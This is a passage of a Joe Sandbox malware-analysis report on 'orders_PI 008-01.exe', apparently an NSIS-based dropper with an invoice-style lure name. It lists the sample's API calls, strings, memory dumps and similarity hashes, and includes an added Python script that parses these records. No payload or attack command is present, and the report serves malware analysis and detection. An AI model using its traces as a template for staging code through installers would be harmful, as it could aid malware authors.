                                          • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                          • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                          • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                        • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                        • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 3248276644-3077356548
                                        • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                        • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                        • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                        • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE

                                         Control-flow Graph (graph image not reproduced; the original marks each block Executed / Not Executed)
                                         • 688 4062bc-4062ee: call 40625b -> 691, 692
                                         • 691 4062f0-40631e: RegQueryValueExW, RegCloseKey -> 692, 693
                                         • 692 40632c -> 694
                                         • 693 406320-406324 -> 694, 695
                                         • 694 406330-406332 (no successors)
                                         • 695 406326-40632a -> 692, 694
                                        APIs
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,?,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                        • RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Call
                                        • API String ID: 3356406503-1824292864
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4

                                         Control-flow Graph (graph image not reproduced; the original marks each block Executed / Not Executed)
                                         • 696 4059d7-405a08: CreateProcessW -> 697, 698
                                         • 697 405a16-405a17 (no successors)
                                         • 698 405a0a-405a13: CloseHandle -> 697
                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                        • CloseHandle.KERNEL32(?), ref: 00405A0D
                                        Strings
                                        • Error launching installer, xrefs: 004059EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                        • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                        • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                        • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
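The function records on this page (the APIs, Strings and Similarity lines) are plain text that an analyst can parse to pivot between reports, for example to find every call site of a given API or to decode the raw argument slots Joe Sandbox prints. The script below is an added example and is not part of the Joe Sandbox report or its tooling. Its sample input is constructed from lines copied from four records above; the regexes, field names, helper functions and the dwCreationFlags table are the example's own assumptions, except that 0x04000000 (the sixth CreateProcessW slot printed for the call at 00405A00) is CREATE_DEFAULT_ERROR_MODE in winbase.h. The report's API ID / API String ID values are Joe Sandbox's own derived keys; the example keeps them as opaque strings rather than recomputing them.

```python
import re
from collections import defaultdict

# Constructed sample input: "APIs" / "Strings" / "Similarity" lines copied from
# four of the report's function records, in the plain-text shape shown above.
SAMPLE = r"""
APIs
• Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,?,?,?), ref: 004063FB
• Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\,?,00405DE2,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
• lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
• GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,75573420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\$C:\Users\user\AppData\Local\Temp\
APIs
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,?,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
• RegCloseKey.KERNELBASE(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
Similarity
• API ID: CloseQueryValue
• String ID: Call
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
• CloseHandle.KERNEL32(?), ref: 00405A0D
Strings
• Error launching installer, xrefs: 004059EA
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
APIs
• GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
• Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
• Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
"""

# Line shapes assumed from the page: "• [Part of subcall function X: ]Api.MODULE(args), ref: ADDR"
# (wsprintfW is printed without an argument list), "• text, xrefs: ADDR", "• Key: value".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
STR_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(
    r"^•\s*(?P<k>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash): ?(?P<v>.*)$"
)
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")


def parse_records(text):
    """Split the listing at each 'APIs' header and collect calls, strings and similarity fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "strings": [], "fields": {}}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        if m := FIELD_RE.match(line):
            cur["fields"][m["k"]] = m["v"]
        elif m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] is not None else []
            cur["apis"].append({"api": m["api"], "module": m["mod"], "args": args,
                                "ref": m["ref"], "subcall": m["sub"]})
        elif m := STR_RE.match(line):
            cur["strings"].append((m["s"], m["ref"]))
    return records


# dwCreationFlags bits from winbase.h (subset sufficient for the value on this page).
CREATION_FLAGS = {
    0x00000001: "DEBUG_PROCESS", 0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x00040000: "CREATE_PROTECTED_PROCESS",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT", 0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW",
}


def decode_creation_flags(value):
    """Names of the flag bits set in a dwCreationFlags value; unknown bits are kept as hex."""
    names = [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]
    unknown = value & ~sum(CREATION_FLAGS) & 0xFFFFFFFF
    if unknown:
        names.append(f"0x{unknown:08X}")
    return names


def find_process_launches(records):
    """(call site, lpCommandLine slot, decoded dwCreationFlags) for each CreateProcessA/W call.
    Slots are the stack values the report prints in parameter order: slot 1 is lpCommandLine,
    slot 5 is dwCreationFlags; '?' means the sandbox did not resolve that slot."""
    hits = []
    for rec in records:
        for call in rec["apis"]:
            if call["api"] in ("CreateProcessA", "CreateProcessW") and len(call["args"]) > 5:
                raw = call["args"][5]
                flags = decode_creation_flags(int(raw, 16)) if HEX8.fullmatch(raw) else ["?"]
                hits.append((call["ref"], call["args"][1], flags))
    return hits


def index_by_api(records):
    """API name -> sorted call-site addresses, for pivoting between function records."""
    idx = defaultdict(set)
    for rec in records:
        for call in rec["apis"]:
            idx[call["api"]].add(call["ref"])
    return {api: sorted(refs) for api, refs in idx.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for ref, cmdline, flags in find_process_launches(recs):
        print(f"CreateProcess @ {ref}: lpCommandLine={cmdline} flags={'|'.join(flags)}")
    for api, refs in sorted(index_by_api(recs).items()):
        print(f"{api:20s} {' '.join(refs)}")
```

Run against the real listing, the index gives one line per API with every call site, which is the fastest way to see that, for instance, GetFileAttributesW is reached from two different functions (00405E34 and 00405EE8). For the CreateProcessW at 00405A00 the only flag set is CREATE_DEFAULT_ERROR_MODE, so nothing in the launch itself (no CREATE_SUSPENDED, no CREATE_NO_WINDOW) is suspicious; what ties this record to the installer stub is the "Error launching installer" string xref, a standard NSIS message, alongside "NSIS Error" in the lstrcpynW subcall of the record above.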
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                        • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                        • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                        • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,00403514,?), ref: 004067F5
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                          • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                          • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                          • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                        • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                        • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                        • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                        • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                        • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                        • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 004059A8
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 004059B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                        • Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
                                        • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                        • Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,00403457,00000000,00000000,0040329E,?,?,00000000,00000000,00000000), ref: 00405F7B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                        • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                        • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,?,?,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,?,00000000), ref: 00405FAA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: same 14 dump regions as listed under the first 00400000 function record above
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                        • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                        APIs
                                        • VirtualProtect.KERNELBASE(6FF4505C,?,?,6FF4504C), ref: 6FF429FD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 16c39351f470264805a40e5d06f94827341f48c669ad0841d804881d00f59c62
                                        • Instruction ID: 6a4c83bfce6863b7657e238d4064027ab3a0e3674a80c58ce1262d54e8bc5e41
                                        • Opcode Fuzzy Hash: 16c39351f470264805a40e5d06f94827341f48c669ad0841d804881d00f59c62
                                        • Instruction Fuzzy Hash: 01F0A5B8524A86DEEB60FF2C84447093FE0BB2B324B18456AE148D6363E37540ACDB91
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                        • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                        • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                        • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                        • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                        • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                        • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,?,?,?), ref: 00403468
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                        APIs
                                        • SendMessageW.USER32(?,?,?,004041A4), ref: 00404387
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
